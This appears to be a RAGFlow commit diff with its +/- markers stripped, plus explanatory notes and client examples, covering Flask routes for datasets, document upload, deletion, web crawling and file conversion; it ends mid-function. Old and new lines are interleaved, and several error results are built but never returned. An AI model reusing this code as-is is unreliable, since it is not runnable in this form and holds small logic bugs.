                return construct_json_result(code=RetCode.DATA_ERROR,
                                             message="There was an error during the document removal process. "
                                                     "Please check the status of the RAGFlow server and try the removal again.")
            # delete the other files
            f2d = File2DocumentService.get_by_document_id(doc.id)
            FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
            File2DocumentService.delete_by_document_id(doc.id)

        # delete the dataset
        if not KnowledgebaseService.delete_by_id(dataset_id):
            return construct_json_result(code=RetCode.DATA_ERROR,
                                         message="There was an error during the dataset removal process. "
                                                 "Please check the status of the RAGFlow server and try the removal again.")
        # success
        return construct_json_result(code=RetCode.SUCCESS, message=f"Remove dataset: {dataset_id} successfully")
    except Exception as e:
        return construct_error_response(e)

# ------------------------------ get details of a dataset ----------------------------------------

@manager.route("/<dataset_id>", methods=["GET"])
@login_required
def get_dataset(dataset_id):
    try:
        dataset = KnowledgebaseService.get_detail(dataset_id)
        if not dataset:
            return construct_json_result(code=RetCode.DATA_ERROR, message="Can't find this dataset!")
        return construct_json_result(data=dataset, code=RetCode.SUCCESS)
    except Exception as e:
        return construct_json_result(e)

# ------------------------------ update a dataset --------------------------------------------

@manager.route("/<dataset_id>", methods=["PUT"])
@login_required
def update_dataset(dataset_id):
    req = request.json
    try:
        # the request cannot be empty
        if not req:
            return construct_json_result(code=RetCode.DATA_ERROR, message="Please input at least one parameter that "
                                                                          "you want to update!")
        # check whether the dataset can be found
        if not KnowledgebaseService.query(created_by=current_user.id, id=dataset_id):
            return construct_json_result(message=f"Only the owner of knowledgebase is authorized for this operation!",
                                         code=RetCode.OPERATING_ERROR)

        exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
        # check whether there is this dataset
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR, message="This dataset cannot be found!")

        if "name" in req:
            name = req["name"].strip()
            # check whether there is duplicate name
            if name.lower() != dataset.name.lower() \
                    and len(KnowledgebaseService.query(name=name, tenant_id=current_user.id,
                                                       status=StatusEnum.VALID.value)) > 1:
                return construct_json_result(code=RetCode.DATA_ERROR,
                                             message=f"The name: {name.lower()} is already used by other "
                                                     f"datasets. Please choose a different name.")

        dataset_updating_data = {}
        chunk_num = req.get("chunk_num")
        # modify the value of 11 parameters

        # 2 parameters: embedding id and chunk method
        # only if chunk_num is 0, the user can update the embedding id
        if req.get("embedding_model_id"):
            if chunk_num == 0:
                dataset_updating_data["embd_id"] = req["embedding_model_id"]
            else:
                construct_json_result(code=RetCode.DATA_ERROR, message="You have already parsed the document in this "
                                                                       "dataset, so you cannot change the embedding "
                                                                       "model.")
        # only if chunk_num is 0, the user can update the chunk_method
        if req.get("chunk_method"):
            if chunk_num == 0:
                dataset_updating_data['parser_id'] = req["chunk_method"]
            else:
                construct_json_result(code=RetCode.DATA_ERROR, message="You have already parsed the document "
                                                                       "in this dataset, so you cannot "
                                                                       "change the chunk method.")
        # convert the photo parameter to avatar
        if req.get("photo"):
            dataset_updating_data["avatar"] = req["photo"]

        # layout_recognize
        if "layout_recognize" in req:
            if "parser_config" not in dataset_updating_data:
                dataset_updating_data['parser_config'] = {}
            dataset_updating_data['parser_config']['layout_recognize'] = req['layout_recognize']

        # TODO: updating use_raptor needs to construct a class

        # 6 parameters
        for key in ["name", "language", "description", "permission", "id", "token_num"]:
            if key in req:
                dataset_updating_data[key] = req.get(key)

        # update
        if not KnowledgebaseService.update_by_id(dataset.id, dataset_updating_data):
            return construct_json_result(code=RetCode.OPERATING_ERROR, message="Failed to update! "
                                                                               "Please check the status of RAGFlow "
                                                                               "server and try again!")

        exist, dataset = KnowledgebaseService.get_by_id(dataset.id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR, message="Failed to get the dataset "
                                                                          "using the dataset ID.")

        return construct_json_result(data=dataset.to_json(), code=RetCode.SUCCESS)
    except Exception as e:
        return construct_error_response(e)

# --------------------------------content management ----------------------------------------------

# ----------------------------upload files-----------------------------------------------------
@manager.route("/<dataset_id>/documents/", methods=["POST"])
@login_required
def upload_documents(dataset_id):
    # no files
    if not request.files:
        return construct_json_result(
            message="There is no file!", code=RetCode.ARGUMENT_ERROR)

    # the number of uploading files exceeds the limit
    file_objs = request.files.getlist("file")
    num_file_objs = len(file_objs)

    if num_file_objs > MAXIMUM_OF_UPLOADING_FILES:
        return construct_json_result(code=RetCode.DATA_ERROR,
                                     message=f"You try to upload {num_file_objs} files, "
                                             f"which exceeds the maximum number of uploading files: {MAXIMUM_OF_UPLOADING_FILES}")

    # no dataset
    exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
    if not exist:
        return construct_json_result(message="Can't find this dataset", code=RetCode.DATA_ERROR)

    for file_obj in file_objs:
        file_name = file_obj.filename
        # no name
        if not file_name:
            return construct_json_result(
                message="There is a file without name!", code=RetCode.ARGUMENT_ERROR)

        # TODO: support the remote files
        if 'http' in file_name:
            return construct_json_result(code=RetCode.ARGUMENT_ERROR, message="Remote files have not unsupported.")

    # get the root_folder
    root_folder = FileService.get_root_folder(current_user.id)
    # get the id of the root_folder
    parent_file_id = root_folder["id"]  # document id
    # this is for the new user, create '.knowledgebase' file
    FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
    # go inside this folder, get the kb_root_folder
    kb_root_folder = FileService.get_kb_folder(current_user.id)
    # link the file management to the kb_folder
    kb_folder = FileService.new_a_file_from_kb(dataset.tenant_id, dataset.name, kb_root_folder["id"])

    # grab all the errs
    err = []
    MAX_FILE_NUM_PER_USER = int(os.environ.get("MAX_FILE_NUM_PER_USER", 0))
    uploaded_docs_json = []
    for file in file_objs:
        try:
            # TODO: get this value from the database as some tenants have this limit while others don't
            if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(dataset.tenant_id) >= MAX_FILE_NUM_PER_USER:
                return construct_json_result(code=RetCode.DATA_ERROR,
                                             message="Exceed the maximum file number of a free user!")
            # deal with the duplicate name
            filename = duplicate_name(
                DocumentService.query,
                name=file.filename,
                kb_id=dataset.id)

            # deal with the unsupported type
            filetype = filename_type(filename)
            if filetype == FileType.OTHER.value:
                return construct_json_result(code=RetCode.DATA_ERROR,
                                             message="This type of file has not been supported yet!")

            # upload to the minio
            location = filename
            while MINIO.obj_exist(dataset_id, location):
                location += "_"

            blob = file.read()
            # the content is empty, raising a warning
            if blob == b'':
                warnings.warn(f"[WARNING]: The file {filename} is empty.")

            MINIO.put(dataset_id, location, blob)

            doc = {
                "id": get_uuid(),
                "kb_id": dataset.id,
                "parser_id": dataset.parser_id,
                "parser_config": dataset.parser_config,
                "created_by": current_user.id,
                "type": filetype,
                "name": filename,
                "location": location,
                "size": len(blob),
                "thumbnail": thumbnail(filename, blob)
            }
            if doc["type"] == FileType.VISUAL:
                doc["parser_id"] = ParserType.PICTURE.value
            if re.search(r"\.(ppt|pptx|pages)$", filename):
                doc["parser_id"] = ParserType.PRESENTATION.value
            DocumentService.insert(doc)

            FileService.add_file_from_kb(doc, kb_folder["id"], dataset.tenant_id)
            uploaded_docs_json.append(doc)
        except Exception as e:
            err.append(file.filename + ": " + str(e))

    if err:
        # return all the errors
        return construct_json_result(message="\n".join(err), code=RetCode.SERVER_ERROR)
    # success
    return construct_json_result(data=uploaded_docs_json, code=RetCode.SUCCESS)

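This route reads every multipart field named file via request.files.getlist("file"), so several documents can go up in one call. A hedged sketch, with host, mount point, and dataset id as placeholders:

import requests  # hypothetical client for the documents-upload route above

session = requests.Session()          # assumed authenticated session
dataset_id = "DATASET_ID"             # placeholder

files = [
    ("file", open("a.pdf", "rb")),    # each part reuses the field name "file"
    ("file", open("b.docx", "rb")),
]
resp = session.post(f"http://localhost:9380/v1/dataset/{dataset_id}/documents/", files=files)
print(resp.json())                    # uploaded doc records, or newline-joined per-file errors
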
# ----------------------------delete a file-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["DELETE"])
@login_required
def delete_document(document_id, dataset_id):  # string
    # get the root folder
    root_folder = FileService.get_root_folder(current_user.id)
    # parent file's id
    parent_file_id = root_folder["id"]
    # consider the new user
    FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
    # store all the errors that may have
    errors = ""
    try:
        # whether there is this document
        exist, doc = DocumentService.get_by_id(document_id)
        if not exist:
            return construct_json_result(message=f"Document {document_id} not found!", code=RetCode.DATA_ERROR)
        # whether this doc is authorized by this tenant
        tenant_id = DocumentService.get_tenant_id(document_id)
        if not tenant_id:
            return construct_json_result(
                message=f"You cannot delete this document {document_id} due to the authorization"
                        f" reason!", code=RetCode.AUTHENTICATION_ERROR)

        # get the doc's id and location
        real_dataset_id, location = File2DocumentService.get_minio_address(doc_id=document_id)

        if real_dataset_id != dataset_id:
            return construct_json_result(message=f"The document {document_id} is not in the dataset: {dataset_id}, "
                                                 f"but in the dataset: {real_dataset_id}.", code=RetCode.ARGUMENT_ERROR)

        # there is an issue when removing
        if not DocumentService.remove_document(doc, tenant_id):
            return construct_json_result(
                message="There was an error during the document removal process. Please check the status of the "
                        "RAGFlow server and try the removal again.", code=RetCode.OPERATING_ERROR)

        # fetch the File2Document record associated with the provided document ID.
        file_to_doc = File2DocumentService.get_by_document_id(document_id)
        # delete the associated File record.
        FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == file_to_doc[0].file_id])
        # delete the File2Document record itself using the document ID. This removes the
        # association between the document and the file after the File record has been deleted.
        File2DocumentService.delete_by_document_id(document_id)

        # delete it from minio
        MINIO.rm(dataset_id, location)
    except Exception as e:
        errors += str(e)
    if errors:
        return construct_json_result(data=False, message=errors, code=RetCode.SERVER_ERROR)

    return construct_json_result(data=True, code=RetCode.SUCCESS)


# ----------------------------list files-----------------------------------------------------
@manager.route('/<dataset_id>/documents/', methods=['GET'])
@login_required
def list_documents(dataset_id):
    if not dataset_id:
        return construct_json_result(
            data=False, message="Lack of 'dataset_id'", code=RetCode.ARGUMENT_ERROR)

    # searching keywords
    keywords = request.args.get("keywords", "")

    offset = request.args.get("offset", 0)
    count = request.args.get("count", -1)
    order_by = request.args.get("order_by", "create_time")
    descend = request.args.get("descend", True)
    try:
        docs, total = DocumentService.list_documents_in_dataset(dataset_id, int(offset), int(count), order_by,
                                                                descend, keywords)

        return construct_json_result(data={"total": total, "docs": docs}, message=RetCode.SUCCESS)
    except Exception as e:
        return construct_error_response(e)

# ----------------------------update: enable rename-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["PUT"])
@login_required
def update_document(dataset_id, document_id):
    req = request.json
    try:
        legal_parameters = set()
        legal_parameters.add("name")
        legal_parameters.add("enable")
        legal_parameters.add("template_type")

        for key in req.keys():
            if key not in legal_parameters:
                return construct_json_result(code=RetCode.ARGUMENT_ERROR, message=f"{key} is an illegal parameter.")

        # The request body cannot be empty
        if not req:
            return construct_json_result(
                code=RetCode.DATA_ERROR,
                message="Please input at least one parameter that you want to update!")

        # Check whether there is this dataset
        exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR, message=f"This dataset {dataset_id} cannot be found!")

        # The document does not exist
        exist, document = DocumentService.get_by_id(document_id)
        if not exist:
            return construct_json_result(message=f"This document {document_id} cannot be found!",
                                         code=RetCode.ARGUMENT_ERROR)

        # Deal with the different keys
        updating_data = {}
        if "name" in req:
            new_name = req["name"]
            updating_data["name"] = new_name
            # Check whether the new_name is suitable
            # 1. no name value
            if not new_name:
                return construct_json_result(code=RetCode.DATA_ERROR, message="There is no new name.")

            # 2. In case that there's space in the head or the tail
            new_name = new_name.strip()

            # 3. Check whether the new_name has the same extension of file as before
            if pathlib.Path(new_name.lower()).suffix != pathlib.Path(
                    document.name.lower()).suffix:
                return construct_json_result(
                    data=False,
                    message="The extension of file cannot be changed",
                    code=RetCode.ARGUMENT_ERROR)

            # 4. Check whether the new name has already been occupied by other file
            for d in DocumentService.query(name=new_name, kb_id=document.kb_id):
                if d.name == new_name:
                    return construct_json_result(
                        message="Duplicated document name in the same dataset.",
                        code=RetCode.ARGUMENT_ERROR)

        if "enable" in req:
            enable_value = req["enable"]
            if is_illegal_value_for_enum(enable_value, StatusEnum):
                return construct_json_result(message=f"Illegal value {enable_value} for 'enable' field.",
                                             code=RetCode.DATA_ERROR)
            updating_data["status"] = enable_value

        # TODO: Chunk-method - update parameters inside the json object parser_config
        if "template_type" in req:
            type_value = req["template_type"]
            if is_illegal_value_for_enum(type_value, ParserType):
                return construct_json_result(message=f"Illegal value {type_value} for 'template_type' field.",
                                             code=RetCode.DATA_ERROR)
            updating_data["parser_id"] = req["template_type"]

        # The process of updating
        if not DocumentService.update_by_id(document_id, updating_data):
            return construct_json_result(
                code=RetCode.OPERATING_ERROR,
                message="Failed to update document in the database! "
                        "Please check the status of RAGFlow server and try again!")

        # name part: file service
        if "name" in req:
            # Get file by document id
            file_information = File2DocumentService.get_by_document_id(document_id)
            if file_information:
                exist, file = FileService.get_by_id(file_information[0].file_id)
                FileService.update_by_id(file.id, {"name": req["name"]})

        exist, document = DocumentService.get_by_id(document_id)

        # Success
        return construct_json_result(data=document.to_json(), message="Success", code=RetCode.SUCCESS)
    except Exception as e:
        return construct_error_response(e)


# Helper method to judge whether it's an illegal value
def is_illegal_value_for_enum(value, enum_class):
    return value not in enum_class.__members__.values()

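The helper tests a raw value against an Enum's members. Whether that works for raw strings depends on the enum: members of a plain Enum never compare equal to their values, while members of a str-mixin enum do. A quick standalone illustration with made-up enums:

from enum import Enum

class Color(str, Enum):   # str mixin: members compare equal to their raw values
    RED = "red"

class Plain(Enum):        # plain Enum: members never equal their raw values
    RED = "red"

def is_illegal_value_for_enum(value, enum_class):
    return value not in enum_class.__members__.values()

print(is_illegal_value_for_enum("red", Color))  # False — "red" matches Color.RED
print(is_illegal_value_for_enum("red", Plain))  # True  — raw strings never match plain members
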
# ----------------------------download a file-----------------------------------------------------
|
||||
@manager.route("/<dataset_id>/documents/<document_id>", methods=["GET"])
|
||||
@login_required
|
||||
def download_document(dataset_id, document_id):
|
||||
try:
|
||||
# Check whether there is this dataset
|
||||
exist, _ = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message=f"This dataset '{dataset_id}' cannot be found!")
|
||||
|
||||
# Check whether there is this document
|
||||
exist, document = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(message=f"This document '{document_id}' cannot be found!",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# The process of downloading
|
||||
doc_id, doc_location = File2DocumentService.get_minio_address(doc_id=document_id) # minio address
|
||||
file_stream = MINIO.get(doc_id, doc_location)
|
||||
if not file_stream:
|
||||
return construct_json_result(message="This file is empty.", code=RetCode.DATA_ERROR)
|
||||
|
||||
file = BytesIO(file_stream)
|
||||
|
||||
# Use send_file with a proper filename and MIME type
|
||||
return send_file(
|
||||
file,
|
||||
as_attachment=True,
|
||||
download_name=document.name,
|
||||
mimetype='application/octet-stream' # Set a default MIME type
|
||||
)
|
||||
|
||||
# Error
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# ----------------------------start parsing-----------------------------------------------------
|
||||
|
||||
# ----------------------------stop parsing-----------------------------------------------------
|
||||
|
||||
# ----------------------------show the status of the file-----------------------------------------------------
|
||||
|
||||
# ----------------------------list the chunks of the file-----------------------------------------------------
|
||||
|
||||
# -- --------------------------delete the chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------edit the status of the chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------insert a new chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------upload a file-----------------------------------------------------
|
||||
|
||||
# ----------------------------get a specific chunk-----------------------------------------------------
|
||||
|
||||
# ----------------------------retrieval test-----------------------------------------------------
|
||||
|
||||
|
||||
|
||||
@ -32,16 +32,15 @@ def set_dialog():
|
||||
dialog_id = req.get("dialog_id")
|
||||
name = req.get("name", "New Dialog")
|
||||
description = req.get("description", "A helpful Dialog")
|
||||
icon = req.get("icon", "")
|
||||
top_n = req.get("top_n", 6)
|
||||
top_k = req.get("top_k", 1024)
|
||||
rerank_id = req.get("rerank_id", "")
|
||||
if not rerank_id: req["rerank_id"] = ""
|
||||
similarity_threshold = req.get("similarity_threshold", 0.1)
|
||||
vector_similarity_weight = req.get("vector_similarity_weight", 0.3)
|
||||
llm_setting = req.get("llm_setting", {
|
||||
"temperature": 0.1,
|
||||
"top_p": 0.3,
|
||||
"frequency_penalty": 0.7,
|
||||
"presence_penalty": 0.4,
|
||||
"max_tokens": 215
|
||||
})
|
||||
if vector_similarity_weight is None: vector_similarity_weight = 0.3
|
||||
llm_setting = req.get("llm_setting", {})
|
||||
default_prompt = {
|
||||
"system": """你是一个智能助手,请总结知识库的内容来回答问题,请列举知识库中的数据详细回答。当所有知识库内容都与问题无关时,你的回答必须包括“知识库中未找到您要的答案!”这句话。回答需要考虑聊天历史。
|
||||
以下是知识库:
|
||||
@ -89,8 +88,11 @@ def set_dialog():
|
||||
"llm_setting": llm_setting,
|
||||
"prompt_config": prompt_config,
|
||||
"top_n": top_n,
|
||||
"top_k": top_k,
|
||||
"rerank_id": rerank_id,
|
||||
"similarity_threshold": similarity_threshold,
|
||||
"vector_similarity_weight": vector_similarity_weight
|
||||
"vector_similarity_weight": vector_similarity_weight,
|
||||
"icon": icon
|
||||
}
|
||||
if not DialogService.save(**dia):
|
||||
return get_data_error_result(retmsg="Fail to new a dialog!")
|
||||
@@ -142,7 +144,7 @@ def get_kb_names(kb_ids):

@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_dialogs():
    try:
        diags = DialogService.query(
            tenant_id=current_user.id,

@@ -14,7 +14,6 @@
# limitations under the License
#

import base64
import os
import pathlib
import re
@@ -23,18 +22,25 @@ import flask
from elasticsearch_dsl import Q
from flask import request
from flask_login import login_required, current_user

from api.db.db_models import Task, File
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.task_service import TaskService, queue_tasks
from rag.nlp import search
from rag.utils import ELASTICSEARCH
from rag.utils.es_conn import ELASTICSEARCH
from api.db.services import duplicate_name
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.db import FileType, TaskStatus, ParserType
from api.db import FileType, TaskStatus, ParserType, FileSource
from api.db.services.document_service import DocumentService
from api.settings import RetCode
from api.utils.api_utils import get_json_result
from rag.utils.minio_conn import MINIO
from api.utils.file_utils import filename_type, thumbnail
from api.utils.web_utils import html2pdf, is_valid_url
from api.utils.web_utils import html2pdf, is_valid_url


@manager.route('/upload', methods=['POST'])
@@ -48,33 +54,42 @@ def upload():
    if 'file' not in request.files:
        return get_json_result(
            data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)
    file = request.files['file']
    if file.filename == '':

    file_objs = request.files.getlist('file')
    for file_obj in file_objs:
        if file_obj.filename == '':
            return get_json_result(
                data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)

    try:
        e, kb = KnowledgebaseService.get_by_id(kb_id)
        if not e:
            return get_data_error_result(
                retmsg="Can't find this knowledgebase!")
        if DocumentService.get_doc_count(kb.tenant_id) >= int(os.environ.get('MAX_FILE_NUM_PER_USER', 8192)):
            return get_data_error_result(
                retmsg="Exceed the maximum file number of a free user!")
            raise LookupError("Can't find this knowledgebase!")

        root_folder = FileService.get_root_folder(current_user.id)
        pf_id = root_folder["id"]
        FileService.init_knowledgebase_docs(pf_id, current_user.id)
        kb_root_folder = FileService.get_kb_folder(current_user.id)
        kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])

        err = []
        for file in file_objs:
            try:
                MAX_FILE_NUM_PER_USER = int(os.environ.get('MAX_FILE_NUM_PER_USER', 0))
                if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(kb.tenant_id) >= MAX_FILE_NUM_PER_USER:
                    raise RuntimeError("Exceed the maximum file number of a free user!")

                filename = duplicate_name(
                    DocumentService.query,
                    name=file.filename,
                    kb_id=kb.id)
                filetype = filename_type(filename)
                if not filetype:
                    return get_data_error_result(
                        retmsg="This type of file has not been supported yet!")
                if filetype == FileType.OTHER.value:
                    raise RuntimeError("This type of file has not been supported yet!")

                location = filename
                while MINIO.obj_exist(kb_id, location):
                    location += "_"
                blob = request.files['file'].read()
                blob = file.read()
                MINIO.put(kb_id, location, blob)
                doc = {
                    "id": get_uuid(),
@@ -92,10 +107,77 @@ def upload():
                    doc["parser_id"] = ParserType.PICTURE.value
                if re.search(r"\.(ppt|pptx|pages)$", filename):
                    doc["parser_id"] = ParserType.PRESENTATION.value
                doc = DocumentService.insert(doc)
                return get_json_result(data=doc.to_json())
                DocumentService.insert(doc)

                FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
            except Exception as e:
                err.append(file.filename + ": " + str(e))
        if err:
            return get_json_result(
                data=False, retmsg="\n".join(err), retcode=RetCode.SERVER_ERROR)
        return get_json_result(data=True)
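Since upload() now iterates request.files.getlist('file'), a single request can carry several files; a sketch of exercising that (URL and auth header assumed):

import requests

# Two files under the same form field name; per-file failures are
# collected in `err` and returned as one joined message.
files = [
    ("file", open("a.pdf", "rb")),
    ("file", open("b.docx", "rb")),
]
r = requests.post("http://localhost:9380/v1/document/upload",  # URL assumed
                  data={"kb_id": "<kb_id>"}, files=files,
                  headers={"Authorization": "<token>"})
print(r.json())  # {"data": true} on success; joined per-file errors otherwise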

@manager.route('/web_crawl', methods=['POST'])
@login_required
@validate_request("kb_id", "name", "url")
def web_crawl():
    kb_id = request.form.get("kb_id")
    if not kb_id:
        return get_json_result(
            data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
    name = request.form.get("name")
    url = request.form.get("url")
    if not is_valid_url(url):
        return get_json_result(
            data=False, retmsg='The URL format is invalid', retcode=RetCode.ARGUMENT_ERROR)
    e, kb = KnowledgebaseService.get_by_id(kb_id)
    if not e:
        raise LookupError("Can't find this knowledgebase!")

    blob = html2pdf(url)
    if not blob: return server_error_response(ValueError("Download failure."))

    root_folder = FileService.get_root_folder(current_user.id)
    pf_id = root_folder["id"]
    FileService.init_knowledgebase_docs(pf_id, current_user.id)
    kb_root_folder = FileService.get_kb_folder(current_user.id)
    kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])

    try:
        filename = duplicate_name(
            DocumentService.query,
            name=name+".pdf",
            kb_id=kb.id)
        filetype = filename_type(filename)
        if filetype == FileType.OTHER.value:
            raise RuntimeError("This type of file has not been supported yet!")

        location = filename
        while MINIO.obj_exist(kb_id, location):
            location += "_"
        MINIO.put(kb_id, location, blob)
        doc = {
            "id": get_uuid(),
            "kb_id": kb.id,
            "parser_id": kb.parser_id,
            "parser_config": kb.parser_config,
            "created_by": current_user.id,
            "type": filetype,
            "name": filename,
            "location": location,
            "size": len(blob),
            "thumbnail": thumbnail(filename, blob)
        }
        if doc["type"] == FileType.VISUAL:
            doc["parser_id"] = ParserType.PICTURE.value
        if re.search(r"\.(ppt|pptx|pages)$", filename):
            doc["parser_id"] = ParserType.PRESENTATION.value
        DocumentService.insert(doc)
        FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
    except Exception as e:
        return server_error_response(e)
    return get_json_result(data=True)

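A sketch of driving the new /web_crawl endpoint (URL and auth header assumed); the handler validates the URL, renders it to PDF with html2pdf, and registers the result as "<name>.pdf":

import requests

r = requests.post("http://localhost:9380/v1/document/web_crawl",  # URL assumed
                  data={"kb_id": "<kb_id>",
                        "name": "example-page",
                        "url": "https://example.com"},
                  headers={"Authorization": "<token>"})
print(r.json())  # {"data": true} once the rendered PDF is stored and registered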
@manager.route('/create', methods=['POST'])
@@ -136,7 +218,7 @@ def create():

@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_docs():
    kb_id = request.args.get("kb_id")
    if not kb_id:
        return get_json_result(
@@ -217,26 +299,39 @@ def change_status():
@validate_request("doc_id")
def rm():
    req = request.json
    doc_ids = req["doc_id"]
    if isinstance(doc_ids, str): doc_ids = [doc_ids]
    root_folder = FileService.get_root_folder(current_user.id)
    pf_id = root_folder["id"]
    FileService.init_knowledgebase_docs(pf_id, current_user.id)
    errors = ""
    for doc_id in doc_ids:
        try:
            e, doc = DocumentService.get_by_id(req["doc_id"])
            e, doc = DocumentService.get_by_id(doc_id)
            if not e:
                return get_data_error_result(retmsg="Document not found!")
            tenant_id = DocumentService.get_tenant_id(req["doc_id"])
            tenant_id = DocumentService.get_tenant_id(doc_id)
            if not tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")
            ELASTICSEARCH.deleteByQuery(
                Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))

            DocumentService.increment_chunk_num(
                doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
            if not DocumentService.delete(doc):
            b, n = File2DocumentService.get_minio_address(doc_id=doc_id)

            if not DocumentService.remove_document(doc, tenant_id):
                return get_data_error_result(
                    retmsg="Database error (Document removal)!")

            MINIO.rm(doc.kb_id, doc.location)
            return get_json_result(data=True)
            f2d = File2DocumentService.get_by_document_id(doc_id)
            FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
            File2DocumentService.delete_by_document_id(doc_id)

            MINIO.rm(b, n)
        except Exception as e:
            return server_error_response(e)
            errors += str(e)

    if errors:
        return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)

    return get_json_result(data=True)

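rm() now accepts either a single id or a list and keeps going past per-document failures; a sketch of the batched form (URL and auth header assumed):

import requests

# A plain string is normalized to a one-element list inside the handler.
r = requests.post("http://localhost:9380/v1/document/rm",  # URL assumed
                  json={"doc_id": ["<doc_id_1>", "<doc_id_2>"]},
                  headers={"Authorization": "<token>"})
print(r.json())  # accumulated error text in "retmsg" if any document failed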
@manager.route('/run', methods=['POST'])
@@ -259,6 +354,14 @@ def run():
            ELASTICSEARCH.deleteByQuery(
                Q("match", doc_id=id), idxnm=search.index_name(tenant_id))

            if str(req["run"]) == TaskStatus.RUNNING.value:
                TaskService.filter_delete([Task.doc_id == id])
                e, doc = DocumentService.get_by_id(id)
                doc = doc.to_dict()
                doc["tenant_id"] = tenant_id
                bucket, name = File2DocumentService.get_minio_address(doc_id=doc["id"])
                queue_tasks(doc, bucket, name)

        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
@@ -279,7 +382,8 @@ def rename():
                data=False,
                retmsg="The extension of file can't be changed",
                retcode=RetCode.ARGUMENT_ERROR)
        if DocumentService.query(name=req["name"], kb_id=doc.kb_id):
        for d in DocumentService.query(name=req["name"], kb_id=doc.kb_id):
            if d.name == req["name"]:
                return get_data_error_result(
                    retmsg="Duplicated document name in the same knowledgebase.")

@@ -288,6 +392,11 @@ def rename():
            return get_data_error_result(
                retmsg="Database error (Document rename)!")

        informs = File2DocumentService.get_by_document_id(req["doc_id"])
        if informs:
            e, file = FileService.get_by_id(informs[0].file_id)
            FileService.update_by_id(file.id, {"name": req["name"]})

        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
@@ -301,7 +410,9 @@ def get(doc_id):
        if not e:
            return get_data_error_result(retmsg="Document not found!")

        response = flask.make_response(MINIO.get(doc.kb_id, doc.location))
        b, n = File2DocumentService.get_minio_address(doc_id=doc_id)
        response = flask.make_response(MINIO.get(b, n))

        ext = re.search(r"\.([^.]+)$", doc.name)
        if ext:
            if doc.type == FileType.VISUAL.value:
@@ -337,7 +448,8 @@ def change_parser():
            return get_data_error_result(retmsg="Not supported yet!")

        e = DocumentService.update_by_id(doc.id,
                {"parser_id": req["parser_id"], "progress": 0, "progress_msg": "", "run": "0"})
                {"parser_id": req["parser_id"], "progress": 0, "progress_msg": "",
                 "run": TaskStatus.UNSTART.value})
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        if "parser_config" in req:

api/apps/file2document_app.py (new file, 129 lines)
@@ -0,0 +1,129 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
#
from elasticsearch_dsl import Q

from api.db.db_models import File2Document
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService

from flask import request
from flask_login import login_required, current_user
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.db import FileType
from api.db.services.document_service import DocumentService
from api.settings import RetCode
from api.utils.api_utils import get_json_result
from rag.nlp import search
from rag.utils.es_conn import ELASTICSEARCH


@manager.route('/convert', methods=['POST'])
@login_required
@validate_request("file_ids", "kb_ids")
def convert():
    req = request.json
    kb_ids = req["kb_ids"]
    file_ids = req["file_ids"]
    file2documents = []

    try:
        for file_id in file_ids:
            e, file = FileService.get_by_id(file_id)
            file_ids_list = [file_id]
            if file.type == FileType.FOLDER.value:
                file_ids_list = FileService.get_all_innermost_file_ids(file_id, [])
            for id in file_ids_list:
                informs = File2DocumentService.get_by_file_id(id)
                # delete
                for inform in informs:
                    doc_id = inform.document_id
                    e, doc = DocumentService.get_by_id(doc_id)
                    if not e:
                        return get_data_error_result(retmsg="Document not found!")
                    tenant_id = DocumentService.get_tenant_id(doc_id)
                    if not tenant_id:
                        return get_data_error_result(retmsg="Tenant not found!")
                    if not DocumentService.remove_document(doc, tenant_id):
